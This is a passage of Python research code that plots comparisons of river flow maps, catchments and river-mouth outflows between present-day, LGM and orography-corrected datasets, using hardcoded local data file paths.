additional_truesink_matches_list_filepath = os.path.join(self.additional_truesink_matches_list_directory,
additional_truesink_matches_list_filename)
if glacier_mask_filename:
glacier_mask_field = iodriver.load_field(glacier_mask_filename,
file_type=iodriver.\
get_file_extension(glacier_mask_filename),
fieldname='sftgif',
field_type='Generic',
grid_type=glacier_mask_grid_type,
**glacier_mask_grid_kwargs)
if glacier_mask_grid_type != grid_type:
glacier_mask_field = utilities.upscale_field(glacier_mask_field,
output_grid_type=grid_type,
method="Mode",
output_grid_kwargs=grid_kwargs,
scalenumbers=False)
else:
glacier_mask_field=None
if flip_data:
flowmap_data_field.flip_data_ud()
data_catchment_field.flip_data_ud()
if data_rdirs_filename:
data_rdirs_field.flip_data_ud()
if rotate_data:
flowmap_data_field.rotate_field_by_a_hundred_and_eighty_degrees()
data_catchment_field.rotate_field_by_a_hundred_and_eighty_degrees()
if data_rdirs_filename:
data_rdirs_field.rotate_field_by_a_hundred_and_eighty_degrees()
if flip_ref:
flowmap_ref_field.flip_data_ud()
ref_catchment_field.flip_data_ud()
ref_rdirs_field.flip_data_ud()
if lsmask_filename and lsmask_has_same_orientation_as_ref:
lsmask_field.flip_data_ud()
if rotate_ref:
flowmap_ref_field.rotate_field_by_a_hundred_and_eighty_degrees()
ref_catchment_field.rotate_field_by_a_hundred_and_eighty_degrees()
ref_rdirs_field.rotate_field_by_a_hundred_and_eighty_degrees()
if lsmask_filename and lsmask_has_same_orientation_as_ref:
lsmask_field.rotate_field_by_a_hundred_and_eighty_degrees()
if invert_ls_mask:
lsmask_field.invert_data()
if extra_lsmask_filename:
extra_lsmask_field.invert_data()
if flip_lsmask and not lsmask_has_same_orientation_as_ref:
lsmask_field.flip_data_ud()
if rotate_lsmask and not lsmask_has_same_orientation_as_ref:
lsmask_field.rotate_field_by_a_hundred_and_eighty_degrees()
if glacier_mask_filename:
if flip_glacier_mask:
glacier_mask_field.flip_data_ud()
if rotate_glacier_mask:
glacier_mask_field.rotate_field_by_a_hundred_and_eighty_degrees()
if lsmask_filename:
lsmask = lsmask_field.get_data()
if extra_lsmask_filename:
extra_lsmask = extra_lsmask_field.get_data()
flowmap_ref_field = flowmap_ref_field.get_data()
flowmap_data_field = flowmap_data_field.get_data()
data_catchment_field = data_catchment_field.get_data()
ref_catchment_field = ref_catchment_field.get_data()
if data_rdirs_filename:
data_rdirs_field = data_rdirs_field.get_data()
ref_rdirs_field = ref_rdirs_field.get_data()
if glacier_mask_filename:
glacier_mask_field = glacier_mask_field.get_data()
plt.figure(figsize=fig_size)
ax = plt.subplot(111)
if extra_lsmask_filename:
image_array,extra_lsmask =fmp_pts.\
make_basic_flowmap_comparison_plot(ax,flowmap_ref_field,
flowmap_data_field,
minflowcutoff,
first_datasource_name,
second_datasource_name,
lsmask,
return_image_array_instead_of_plotting=True,
glacier_mask=glacier_mask_field,
second_lsmask = extra_lsmask)
else:
image_array =fmp_pts.\
make_basic_flowmap_comparison_plot(ax,flowmap_ref_field,
flowmap_data_field,
minflowcutoff,
first_datasource_name,
second_datasource_name,
lsmask,
return_image_array_instead_of_plotting=True,
glacier_mask=glacier_mask_field)
temp_file_list = []
if catchment_and_outflows_mods_list_filename:
ref_outflow_field = iodriver.load_field(reference_rmouth_outflows_filename,
file_type=iodriver.\
get_file_extension(reference_rmouth_outflows_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
data_outflow_field = iodriver.load_field(data_rmouth_outflows_filename,
file_type=iodriver.\
get_file_extension(data_rmouth_outflows_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
if flip_data:
data_outflow_field.flip_data_ud()
if rotate_data:
data_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
ref_catchment_field, ref_outflow_field, data_catchment_field, data_outflow_field =\
rc_pts.modify_catchments_and_outflows(ref_catchment_field,ref_outflow_field,flowmap_ref_field,
ref_rdirs_field,data_catchment_field,data_outflow_field,
catchment_and_outflows_modifications_list_filename=\
catchment_and_outflows_mods_list_filepath,
grid_type=grid_type)
if flip_data:
data_outflow_field.flip_data_ud()
if rotate_data:
data_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
reference_rmouth_outflows_filename=os.path.join(self.scratch_dir,
self.temp_label + os.path.\
basename(reference_rmouth_outflows_filename))
data_rmouth_outflows_filename=os.path.join(self.scratch_dir,
self.temp_label + os.path.\
basename(reference_rmouth_outflows_filename))
temp_file_list.append(reference_rmouth_outflows_filename)
temp_file_list.append(data_rmouth_outflows_filename)
iodriver.write_field(reference_rmouth_outflows_filename,
field=ref_outflow_field,
file_type=iodriver.\
get_file_extension(reference_rmouth_outflows_filename))
iodriver.write_field(data_rmouth_outflows_filename,
field=data_outflow_field,
file_type=iodriver.\
get_file_extension(data_rmouth_outflows_filename))
matchedpairs,_ = mtch_rm.main(reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
flip_data_field=flip_data,
rotate_data_field=rotate_data,
flip_ref_field=flip_ref,
rotate_ref_field=rotate_ref,
param_set=matching_parameter_set,
grid_type=grid_type,**grid_kwargs)
if additional_matches_list_filename:
additional_matches = mtch_rm.load_additional_manual_matches(additional_matches_list_filepath,
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
flip_data_field=flip_data,
rotate_data_field=rotate_data,
grid_type='HD',**grid_kwargs)
matchedpairs.extend(additional_matches)
if additional_truesink_matches_list_filename:
additional_matches = mtch_rm.load_additional_manual_truesink_matches(additional_truesink_matches_list_filepath,
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
ref_flowmap_filename,
data_flowmap_filename,
flip_data_rmouth_outflow_field=\
flip_data,
rotate_data_rmouth_outflow_field=\
rotate_data,
flip_data_flowmap_field=\
flip_data,
rotate_data_flowmap_field=\
rotate_data,
grid_type=grid_type,
**grid_kwargs)
matchedpairs.extend(additional_matches)
for pair in matchedpairs:
if pair[0].get_lat() > 310:
continue
alt_color_num = 8
if (rivers_to_plot is not None) and (rivers_to_plot_alt_color is not None):
if ((not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot) and
(not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot_alt_color)):
continue
elif (((pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot) and
((pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot_alt_color)):
raise RuntimeError("Cannot plot a catchment in both original and alternative colors - check for duplicate")
elif ((pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot):
alt_color=False
elif ((pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot_secondary_alt_color):
alt_color=True
alt_color_num = 9
else:
alt_color=True
elif rivers_to_plot is not None:
alt_color = False
if not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot:
continue
elif rivers_to_plot_alt_color is not None:
alt_color = True
if not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot_alt_color:
continue
else:
alt_color = False
print("Ref Point: " + str(pair[0]) + "Matches: " + str(pair[1]))
image_array = fmp_pts.add_selected_catchment_to_existing_plot(image_array,data_catchment_field,
ref_catchment_field,data_catchment_field,
flowmap_data_field, ref_rdirs_field,
data_rdirs_field, pair=pair,
catchment_grid_changed=False,
use_alt_color=alt_color,
alt_color_num=alt_color_num,
use_single_color_for_discrepancies=\
use_single_color_for_discrepancies,
use_only_one_color_for_flowmap=\
use_only_one_color_for_flowmap,
grid_type=grid_type,
data_original_scale_grid_type=grid_type)
if extra_lsmask_filename:
image_array = fmp_pts.add_extra_flowmap(image_array,extra_lsmask)
if remove_antartica:
image_array = image_array[:320]
fmp_pts.plot_composite_image(ax,image_array,minflowcutoff,first_datasource_name,second_datasource_name,
use_single_color_for_discrepancies,use_only_one_color_for_flowmap,use_title,
colors=self.colors,difference_in_catchment_label=difference_in_catchment_label,
flowmap_grid=flowmap_grid,plot_glaciers=True if glacier_mask_filename else False,
second_ls_mask=True if extra_lsmask_filename else False)
for temp_file in temp_file_list:
if os.path.basename(temp_file).startswith("temp_"):
print("Deleting File: {0}".format(temp_file))
os.remove(temp_file)
def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale'
'_rdirs_20161031_113238_updated.nc')
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs"
"_20161031_113238_updated.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_"
"post_processing_20160427_141158.nc",
data_catchment_filename="catchmentmap_ICE5G_data_ALG4_"
"sinkless_downscaled_ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc",
ref_rdirs_filename="rivdir_vs_1_9_data_from_stefan.nc",
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
corrected_hd_rdirs_rmouthoutflow_file,
data_rmouth_outflows_filename=\
upscaled_rdirs_rmouthoutflow_file,
lsmask_filename=lsmask_filename,
minflowcutoff=100,flip_data=True,
rotate_data=True,flip_ref=False,rotate_ref=False,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=False,
first_datasource_name="Reference",
matching_parameter_set='extensive',
rivers_to_plot=[(117,424),(121,176),(179,260),
(160,573),(40,90),(217,432),
(104,598),(46,504),(252,638),
(32,612),(132,494),(171,371),
(50,439),(121,456),(40,682),
(88,430)],
rivers_to_plot_alt_color=[(192,384),(82,223),
(249,244),(117,603),
(35,521),(144,548),
(72,641),(54,29),
(88,457),(62,173),
(91,111),(125,165),
(159,235),(237,392),
(36,660),(51,717),
(33,603),(90,418),
(89,482),(111,380)],
rivers_to_plot_secondary_alt_color=[(64,175),
(42,468),
(32,577),
(43,508),
(117,130),
(230,427),
(36,631),
(86,436),
(55,174),
(82,113),
(60,416),
(154,388),
(136,536),
(201,286)],
use_single_color_for_discrepancies=True,
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_ice5g_10min_upscaled_"
"rdirs_vs_modern_day.txt",
second_datasource_name="Data",grid_type='HD')
def compare_present_day_and_lgm_river_directions_with_catchments_virna_data_plus_tarasov_style_orog_corrs_for_both(self):
"""Compare LGM to present using Virna's data plus tarasov style orography corrections for both times"""
ref_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans"
"_lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
data_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask"
"_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195436_upscaled_updated.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask"
"_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195436_HD_transf.dat")
ref_catchment_filename=("catchmentmap_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask"
"_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
data_catchment_filename=("catchmentmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_"
"lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195436_upscaled_updated.nc")
ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_"
"sinks_oceans_lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_"
"updated_transf.dat")
reference_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_minute_"
"data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
"_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
data_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_minute_"
"data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
"_rdirs_tarasov_orog_corrs_20170422_195436_upscaled_updated.nc")
glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
ref_catchment_filename,
data_catchment_filename=\
data_catchment_filename,
ref_rdirs_filename=\
ref_rdirs_filename,
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
lsmask_filename=lsmask_filename,
minflowcutoff=100,
flip_data=False,
rotate_data=True,
flip_ref=False,
rotate_ref=True,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=True,
first_datasource_name="Present day",
second_datasource_name="LGM",
matching_parameter_set='extensive',
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_lgm_vs_present_day.txt",
additional_matches_list_filename=\
"additional_matches_10min_upscaled_lgm_vs_present.txt",
use_single_color_for_discrepancies=True,
use_only_one_color_for_flowmap=False,
use_title=False,remove_antartica=True,
difference_in_catchment_label="Difference",
glacier_mask_filename=glacier_mask_filename,
glacier_mask_grid_type='LatLong10min',
flip_glacier_mask=True,
rotate_glacier_mask=True,
grid_type='HD')
def compare_present_day_river_directions_with_catchments_virna_data_with_vs_without_tarasov_style_orog_corrs(self):
"""Compare present day data with and without tarasov upscaling using virna's data"""
ref_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans"
"_lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
data_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ten_minute_data_from_virna_0k_ALG4_sinkless"
"_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123"
"_165707_upscaled_updated.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask"
"_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_HD_transf.nc")
ref_catchment_filename=("catchmentmap_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask"
"_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
data_catchment_filename=("catchmentmap_ten_minute_data_from_virna_0k_ALG4_sinkless"
"_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707_upscaled_updated.nc")
ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_"
"sinks_oceans_lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_"
"updated_transf.dat")
reference_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_minute_"
"data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
"_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
data_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_"
"minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus"
"_upscale_rdirs_20170123_165707_upscaled_updated.nc")
glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
ref_catchment_filename,
data_catchment_filename=\
data_catchment_filename,
ref_rdirs_filename=\
ref_rdirs_filename,
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
lsmask_filename=lsmask_filename,
minflowcutoff=100,
flip_data=False,
rotate_data=True,
flip_ref=False,
rotate_ref=True,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=True,
first_datasource_name="Present day",
second_datasource_name="LGM",
matching_parameter_set='extensive',
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_lgm_vs_present_day.txt",
additional_matches_list_filename=\
"additional_matches_10min_upscaled_lgm_vs_present.txt",
use_single_color_for_discrepancies=True,
use_only_one_color_for_flowmap=False,
use_title=False,remove_antartica=True,
difference_in_catchment_label="Difference",
glacier_mask_filename=glacier_mask_filename,
glacier_mask_grid_type='LatLong10min',
flip_glacier_mask=True,
rotate_glacier_mask=True,
grid_type='HD')
def compare_lgm_river_directions_with_catchments_virna_data_with_vs_without_tarasov_style_orog_corrs(self):
"""Compare lgm data with and without tarasov upscaling using virna's data"""
tarasov_upscaled_data_datetime="20170518_193949"
ref_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ten_minute_data_from_virna_lgm_ALG4_sinkless"
"_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170127"
"_163957_upscaled_updated.nc")
data_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask"
"_plus_upscale_rdirs_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
format(tarasov_upscaled_data_datetime))
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask"
"_plus_upscale_rdirs_tarasov_orog_corrs_{0}_HD_transf.dat".\
format(tarasov_upscaled_data_datetime))
ref_catchment_filename=("catchmentmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_"
"lsmask_plus_upscale_rdirs_20170127_163957_upscaled_updated.nc")
data_catchment_filename=("catchmentmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_"
"lsmask_plus_upscale_rdirs_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
format(tarasov_upscaled_data_datetime))
ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true"
"_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc")
reference_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_"
"minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus"
"_upscale_rdirs_20170123_165707_upscaled_updated.nc")
data_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_minute_"
"data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
"_rdirs_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
format(tarasov_upscaled_data_datetime))
glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
ref_catchment_filename,
data_catchment_filename=\
data_catchment_filename,
ref_rdirs_filename=\
ref_rdirs_filename,
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
lsmask_filename=lsmask_filename,
minflowcutoff=100,
flip_data=False,
rotate_data=True,
flip_ref=False,
rotate_ref=True,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=True,
first_datasource_name="Present day",
second_datasource_name="LGM",
matching_parameter_set='extensive',
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_lgm_vs_present_day.txt",
additional_matches_list_filename=\
"additional_matches_10min_upscaled_lgm_vs_present.txt",
use_single_color_for_discrepancies=True,
use_only_one_color_for_flowmap=False,
use_title=False,remove_antartica=True,
difference_in_catchment_label="Difference",
glacier_mask_filename=glacier_mask_filename,
glacier_mask_grid_type='LatLong10min',
flip_glacier_mask=True,
rotate_glacier_mask=True,
grid_type='HD')
def upscaled_rdirs_with_and_without_tarasov_upscaled_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
"""
Note this was adapted from previous code... not all variable names are accurate
"""
data_label="20170511_163955"
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale'
'_rdirs_20161031_113238_updated.nc')
data_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless'
'_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs"
"_20161031_113238_updated.nc")
upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_upscale_rdirs_" + data_label + "_updated.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
"catchmentmap_ICE5G_data_ALG4_"
"sinkless_downscaled_ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc",
data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
"srtm30plus_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_"
"rdirs_" + data_label + "_updated.nc",
ref_rdirs_filename="generated/upscaled/upscaled_rdirs_ICE5G_data_ALG4_sinkless_downscaled_"
"ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc",
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
corrected_hd_rdirs_rmouthoutflow_file,
data_rmouth_outflows_filename=\
upscaled_rdirs_rmouthoutflow_file,
lsmask_filename=lsmask_filename,
minflowcutoff=50,flip_data=False,
rotate_data=True,flip_ref=True,rotate_ref=True,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=False,
first_datasource_name="Reference",
matching_parameter_set='magnitude_extensive',
use_single_color_for_discrepancies=True,
second_datasource_name="Data",grid_type='HD')
def upscaled_rdirs_with_and_without_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
"""
Note this was adapted from previous code... not all variable names are accurate
"""
data_label="20170511_230901"
ref_label="20170507_135726"
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale'
'_rdirs_{0}_updated.nc'.format(ref_label))
data_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_data_ALG4_sinkless'
'_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs"
"_{0}_updated.nc".format(ref_label))
upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_"
"data_ALG4_sinkless_"
"downscaled_ls_mask_0k_upscale_rdirs_" + data_label + "_updated.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
"catchmentmap_ICE5G_data_ALG4_"
"sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc"\
.format(ref_label),
data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
"srtm30plus_north_america_only_data_ALG4_sinkless_downscaled_ls_"
"mask_0k_upscale_rdirs_" + data_label + "_updated.nc",
ref_rdirs_filename="generated/upscaled/upscaled_rdirs_ICE5G_data"
"_ALG4_sinkless_downscaled_"
"ls_mask_0k_upscale_rdirs_{0}_updated.nc".format(ref_label),
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
corrected_hd_rdirs_rmouthoutflow_file,
data_rmouth_outflows_filename=\
upscaled_rdirs_rmouthoutflow_file,
lsmask_filename=lsmask_filename,
minflowcutoff=50,flip_data=False,
rotate_data=True,flip_ref=False,rotate_ref=True,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=False,
first_datasource_name="Reference",
matching_parameter_set='magnitude_extensive',
use_single_color_for_discrepancies=True,
second_datasource_name="Data",grid_type='HD')
def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
data_label="20170508_021105"
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless'
'_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_upscale_rdirs_" + data_label + "_updated.nc")
self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
data_flowmap_filename=data_filename,
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_"
"post_processing_20160427_141158.nc",
data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
"srtm30plus_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_"
"rdirs_" + data_label + "_updated.nc",
ref_rdirs_filename="rivdir_vs_1_9_data_from_stefan.nc",
data_rdirs_filename=None,
reference_rmouth_outflows_filename=\
corrected_hd_rdirs_rmouthoutflow_file,
data_rmouth_outflows_filename=\
upscaled_rdirs_rmouthoutflow_file,
lsmask_filename=lsmask_filename,
minflowcutoff=100,flip_data=False,
rotate_data=True,flip_ref=False,rotate_ref=False,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=False,
first_datasource_name="Reference",
matching_parameter_set='extensive',
rivers_to_plot=[(117,424),(121,176),(179,260),
(160,573),(40,90),(217,432),
(104,598),(46,504),(252,638),
(32,612),(132,494),(171,371),
(50,439),(121,456),(40,682),
(88,430)],
rivers_to_plot_alt_color=[(192,384),(82,223),
(249,244),(117,603),
(35,521),(144,548),
(72,641),(54,29),
(88,457),(62,173),
(91,111),(125,165),
(159,235),(237,392),
(36,660),(51,717),
(33,603),(90,418),
(89,482),(111,380)],
rivers_to_plot_secondary_alt_color=[(64,175),
(42,468),
(32,577),
(43,508),
(117,130),
(230,427),
(36,631),
(86,436),
(55,174),
(82,113),
(60,416),
(154,388),
(136,536),
(201,286)],
use_single_color_for_discrepancies=True,
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_ice5g_10min_upscaled_"
"rdirs_vs_modern_day.txt",
second_datasource_name="Data",grid_type='HD')
def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
data_label="20170511_230901"
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_data_ALG4_sinkless'
'_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only"
"_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_"
